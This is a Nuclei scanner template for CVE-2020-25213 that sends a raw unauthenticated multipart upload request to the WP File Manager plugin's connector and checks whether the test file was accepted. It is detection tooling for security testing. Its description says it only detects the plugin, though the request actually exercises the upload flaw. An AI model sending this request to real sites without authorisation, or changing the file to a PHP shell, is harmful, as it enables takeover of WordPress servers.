nuclei-templates/cves/2020/CVE-2020-25213.yaml


id: CVE-2020-25213

info:
  name: WP File Manager RCE
  author: foulenzer
  severity: critical
  description: The vulnerability allows unauthenticated remote attackers to upload .php files. This template only detects the plugin, not its vulnerability.
  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
  tags: cve,cve2020,wordpress,rce

  # Uploaded file will be accessible at:-
  # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt

requests:
  - raw:
      - |
        POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: curl/7.64.1
        Accept: */*
        Content-Length: 608
        Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
        Connection: close

        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="reqid"

        17457a1fe6959
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="cmd"

        upload
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="target"

        l1_Lw
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="mtime[]"

        1576045135
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="upload[]"; filename="poc.txt"
        Content-Type: text/plain

        poc-test
        --------------------------ca81ac1fececda48--

    # All three matchers must succeed for the template to report a finding.
    matchers-condition: and
    matchers:
      # Response body must contain both the file name and the word "added".
      - type: word
        words:
          - poc.txt
          - added
        condition: and

      # Response must be served as JSON.
      - type: word
        words:
          - application/json
        part: header

      - type: status
        status:
          - 200